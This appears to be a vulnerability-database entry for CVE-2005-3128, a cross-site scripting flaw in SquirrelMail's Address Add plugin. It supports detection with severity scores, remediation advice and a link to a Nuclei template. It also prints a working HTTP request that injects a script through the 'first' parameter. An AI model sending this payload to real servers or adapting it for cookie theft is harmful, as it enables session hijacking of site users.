🔙 목록으로 돌아가기

CVE-2005-3128: SquirrelMail Address Add 1.4.2 - Cross-Site Scripting

TitleSquirrelMail Address Add 1.4.2 - Cross-Site Scripting
AuthordhiyaneshDk
SeverityMedium
ImpactAttackers can execute arbitrary scripts in the victim's browser, leading to session hijacking or defacement.
RemediationApply the latest security patches and updates from the vendor to address this vulnerability.
CVSS Score5.4
EPSS Score0.01733
CVE IDCVE-2005-3128
CWE IDCWE-80
Tags cve cve2005 xss squirrelmail plugin edb vkev vuln

🔍 Vulnerability Description

SquirrelMail Address Add 1.4.2 plugin contains a cross-site scripting vulnerability. It fails to properly sanitize user-supplied input, thus allowing an attacker to execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

🌐 HTTP Request

GET /plugins/address_add/add.php?first=HOVER%20ME!%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2005/CVE-2005-3128.yaml

🦈 Packet Capture: ⬇️ Download cve-2005-3128.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A